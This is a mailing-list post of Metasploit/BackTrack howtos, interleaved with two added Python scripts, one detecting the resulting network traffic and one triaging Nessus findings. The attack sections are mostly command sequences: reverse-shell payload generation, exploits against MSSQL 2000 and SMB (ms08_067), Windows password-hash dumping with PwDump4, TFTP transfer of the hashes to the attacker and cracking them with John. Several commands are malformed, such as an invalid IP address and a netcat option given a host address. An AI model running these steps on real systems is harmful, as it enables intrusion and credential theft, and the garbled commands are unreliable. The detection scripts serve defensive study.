Okay, you guys, here's a couple of HowTo's for basic Metasploit from Backtrack4R1:
0) Quick Windows MultiHandler Reverse Shell

   startx
   /etc/init.d/wicd start          (check that your wireless or wired connection is working)
   msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444 > /root/payload.exe
   optimize /root/putty.exe        (for a Windows target)
   msfconsole
   msf > use exploit/multi/handler
   msf > set PAYLOAD windows/meterpreter/reverse_tcp
   msf > show options
   msf > set LHOST (local host ip)
   msf > shell go
   msf > migrate <process #>       example: migrate 256
   msf > show exploits
   msf > use <name>                (from show exploits)
   msf > set PAYLOAD
   msf > set RHOST
   msf > set LHOST

1) Nmap Mssql 2000

   nmap -sT -O 10.10.10.254
   nmap -sV 10.10.10.254
   msfconsole
   show exploits                   (cut and paste with your mouse highlight)
   use mssql2000_resolution
   set PAYLOAD win32_bind_meterpreter
   show options
   set RHOST 10.10.10.254          (target)
   exploit
   help
   execute -n Process
   execute -f file
   execute -f cmd -c
   interact 1
   ipconfig

   See Menu ---> System ---> MISC ---> TFTPD Server Start

   On your Backtrack Linux shell:
   cd /pentest/windows-binaries/tools
   ls
   cp PwDump4.dll /tmp/PwDump4.exe
   cd /pentest/password/dictionaries
   ls
   cp wordlist.txt.gz /tmp/wordlist.txt
   tftp -i 10.10.10.254 get PwDump4.dll   (or .exe)
   tftp -i 10.10.10.254 get nc.exe
   <go back to the Windows shell>
   PwDump4.exe
   PwDump4.exe /l /o:pwdump4.txt
   tftp 10.10.10.666 put pwdump4.txt      (our ip)
   <back to the Linux BT environment shell>
   cat pwdump4.txt
   john pwdump4.txt
   john -show pwdump4.txt
   john -w:wordlist.txt -f:NT pwdump4.txt
   <back to Windows>
   nc -L -p 10.10.10.254
   <back to the BT Linux shell>
   telnet victim                   (log in as Administrator with the password)

2) Quick VNC using Autopwn

   msfconsole
   db_create foo
   db_nmap 10.10.10.254            (or your target ip)
   db_autopwn -h
   db_autopwn -p -e
   sessions -i 1
   sysinfo
   run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell

   msfconsole
   use windows/smb/ms08_067_netapi
   show options
   set PAYLOAD windows/vncinject/reverse_tcp
   show options
   set RHOST 10.10.10.254
   show options
   set LHOST 10.10.10.666
   exploit                         <spawns a shell on the reverse machine>
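Seen from the monitoring side, the steps above leave a recognisable footprint: a host connecting out to the handler's LPORT, followed within minutes by a TFTP transfer that stages PwDump4 and nc.exe. The following detection script is an added example and is not part of the original post; its flow-log format, the addresses and the "monitored subnet" are all constructed, and the two port rules are taken directly from the LPORT=4444 and TFTP lines in the howto.

```python
"""Added example: detection rules for the traffic the howto above generates.

The log format is a constructed, simplified flow log (not any real product's
format) and the addresses are lab placeholders. The rules use the howto's own
numbers: 4444 is the LPORT given to windows/meterpreter/reverse_tcp and the
multi/handler, and 69/udp is the TFTP server used to move PwDump4 and nc.exe.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: <timestamp> <proto> <src>:<sport> -> <dst>:<dport> <bytes>
SAMPLE_LOG = """\
2011-01-29T12:00:01 TCP 10.10.10.254:49321 -> 10.10.10.66:4444 1532
2011-01-29T12:00:02 TCP 10.10.10.254:49322 -> 10.10.10.20:443 820
2011-01-29T12:00:05 UDP 10.10.10.254:51000 -> 10.10.10.66:69 204
2011-01-29T12:01:00 TCP 10.10.10.7:40010 -> 198.51.100.10:80 3800
2011-01-29T14:30:00 TCP 10.10.10.7:40011 -> 198.51.100.10:4444 60
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proto>TCP|UDP) (?P<src>[\d.]+):\d+ -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<bytes>\d+)$"
)

# (protocol, destination port) -> why it matters; ports from the howto itself.
SUSPECT_PORTS = {
    ("TCP", 4444): "connection to the Metasploit default handler port",
    ("UDP", 69): "TFTP transfer (tool staging)",
}

MONITORED = ipaddress.ip_network("10.10.10.0/24")  # assumed: the lab's server subnet


def parse_line(line):
    """Parse one constructed flow line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "proto": m["proto"],
        "src": ipaddress.ip_address(m["src"]),
        "dst": ipaddress.ip_address(m["dst"]),
        "dport": int(m["dport"]),
    }


def find_suspect_flows(log_text):
    """Return (timestamp, src, proto, dport, reason) for every flow that leaves a
    monitored host and hits a port in SUSPECT_PORTS."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["src"] not in MONITORED:
            continue
        reason = SUSPECT_PORTS.get((rec["proto"], rec["dport"]))
        if reason:
            findings.append((rec["ts"], str(rec["src"]), rec["proto"], rec["dport"], reason))
    return findings


def hosts_with_chain(findings, window_seconds=300):
    """Hosts that triggered two *different* rules inside the window. A handler
    connection followed by tool staging is the sequence the howto walks through,
    and that pair is far more significant than either hit on its own."""
    by_host = defaultdict(list)
    for ts, src, _proto, _dport, reason in findings:
        by_host[src].append((ts, reason))
    flagged = []
    for host, hits in by_host.items():
        hits.sort()
        for i, (ts_i, reason_i) in enumerate(hits):
            later = [r for ts, r in hits[i + 1:]
                     if (ts - ts_i).total_seconds() <= window_seconds]
            if any(r != reason_i for r in later):
                flagged.append(host)
                break
    return sorted(flagged)


if __name__ == "__main__":
    hits = find_suspect_flows(SAMPLE_LOG)
    for hit in hits:
        print(*hit)
    print("likely post-exploitation chain on:", hosts_with_chain(hits))
```

Run as-is it reports three single hits but only one chained host (10.10.10.254): the second host's lone 4444 connection hours later is worth a look, but the correlation step is what separates "someone scanned us" noise from the staged sequence in the howto. Swap the `SUSPECT_PORTS` table and `MONITORED` for your own environment; the default LPORT is trivially changed by an operator, so treat the port rule as a starting point and the chaining logic as the durable part.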
4) Example using Nessus Plugins and db_autopwn

   <shell>
   apt-get install nessusd nessus
   nessusd                         (takes about 10 minutes to start)
   cd /pentest/exploits/framework3
   svn update
   ./msfconsole
   <another shell>
   ./nessus
   Start a scan and generate a report.
   msf > help
   msf > db_create /root/database/foobar.db
   msf > db_import
   Cross-reference from the report, showing the exploit port open and the probable exploit reported by Nessus.
   Save the output of the Nessus report to /root/nessus.nbe
   msf > db_import_nessus_nbe /root/nessus.nbe
   msf > db_autopwn -p -e
   Voilà!

* DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories only and for fully qualified professionals after written Corporate approval. We do not advocate "cracking" and prefer the definition hacker in its original term meaning those who reverse engineer and creatively evaluate to learn. We do not advocate "learning to hack"; instead hacking to learn.

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com, January 29, 2011, Noon until 3PM.

--
(503) 754-4452
(623) 688-3392
http://www.obnosis.com
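The cross-referencing step in 4) (which Nessus findings sit on a port that a scan actually confirmed open) is also the triage question a patching team asks, and it is easy to answer without db_autopwn. The script below is an added example, not code from the original post or from Metasploit; it reads the pipe-delimited NBE rows that db_import_nessus_nbe consumes and the `nmap -oG` grepable output, and joins them on host and port. The NBE rows, the nmap output, and the plugin ids (99001 and up) are all constructed placeholders, not real Nessus plugin ids.

```python
"""Added example: confirm Nessus NBE findings against nmap -oG open ports.

NBE results rows look like
  results|<subnet>|<host>|<service (port/proto)>|<plugin id>|<type>|<description>
with type one of "Security Hole", "Security Warning", "Security Note", "Log Message".
Everything below is constructed sample data; plugin ids are placeholders.
"""
import re
from collections import defaultdict

NBE_SAMPLE = """\
timestamps|||scan_start|Sat Jan 29 12:00:00 2011|
timestamps||10.10.10.254|host_start|Sat Jan 29 12:00:01 2011|
results|10.10.10|10.10.10.254|ms-sql-s (1433/tcp)|99001|Security Hole|Placeholder: outdated MSSQL 2000 build\\nRisk factor: High
results|10.10.10|10.10.10.254|microsoft-ds (445/tcp)|99002|Security Hole|Placeholder: SMB service missing a vendor patch
results|10.10.10|10.10.10.254|general/tcp|99003|Security Note|Placeholder: OS fingerprint
results|10.10.10|10.10.10.254|netbios-ssn (139/tcp)|99004|Security Warning|Placeholder: null session allowed
timestamps||10.10.10.254|host_end|Sat Jan 29 12:05:00 2011|
"""

# Constructed nmap -oG output for the same host: only 445 and 1433 confirmed open.
NMAP_GREPABLE = """\
# constructed nmap -oG output (not a real scan)
Host: 10.10.10.254 ()\tStatus: Up
Host: 10.10.10.254 ()\tPorts: 445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2000/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)
"""

SEVERITY_RANK = {"Security Hole": 3, "Security Warning": 2, "Security Note": 1, "Log Message": 0}
PORT_RE = re.compile(r"\((\d+)/(tcp|udp)\)$")
HOST_PORTS_RE = re.compile(r"^Host: (\S+) .*?Ports: (.*?)(?:\t|$)")


def parse_nbe(text):
    """Return one dict per 'results' row; port is None for port-less rows such as general/tcp."""
    rows = []
    for line in text.splitlines():
        fields = line.split("|")
        if fields[0] != "results" or len(fields) < 7:
            continue
        host, service, plugin_id, severity = fields[2], fields[3], fields[4], fields[5]
        description = "|".join(fields[6:])  # descriptions may themselves contain '|'
        m = PORT_RE.search(service)
        port, proto = (int(m.group(1)), m.group(2)) if m else (None, service)
        rows.append({"host": host, "port": port, "proto": proto, "plugin_id": plugin_id,
                     "severity": severity, "description": description})
    return rows


def parse_nmap_grepable(text):
    """Map host -> {(port, proto)} for ports nmap reported as open."""
    open_ports = defaultdict(set)
    for line in text.splitlines():
        m = HOST_PORTS_RE.match(line)
        if not m:
            continue
        host, ports = m.group(1), m.group(2)
        for entry in ports.split(", "):
            port, state, proto = entry.split("/")[:3]
            if state == "open":
                open_ports[host].add((int(port), proto))
    return open_ports


def cross_reference(nbe_text, nmap_text, min_severity="Security Warning"):
    """Findings at or above min_severity whose port nmap independently saw open, worst first."""
    open_ports = parse_nmap_grepable(nmap_text)
    threshold = SEVERITY_RANK[min_severity]
    confirmed = [f for f in parse_nbe(nbe_text)
                 if f["port"] is not None
                 and SEVERITY_RANK.get(f["severity"], 0) >= threshold
                 and (f["port"], f["proto"]) in open_ports.get(f["host"], set())]
    confirmed.sort(key=lambda f: -SEVERITY_RANK[f["severity"]])
    return confirmed


if __name__ == "__main__":
    for f in cross_reference(NBE_SAMPLE, NMAP_GREPABLE):
        print(f["host"], f"{f['port']}/{f['proto']}", f["plugin_id"], f["severity"])
```

On the sample data the two "Security Hole" rows survive (1433 and 445 are open in both tools) while the 139/tcp warning drops out because nmap saw that port filtered, which is exactly the disagreement you want surfaced before anyone spends time on a finding: either the filter is doing its job, or the two scans ran from different network positions and the report needs re-checking.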
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss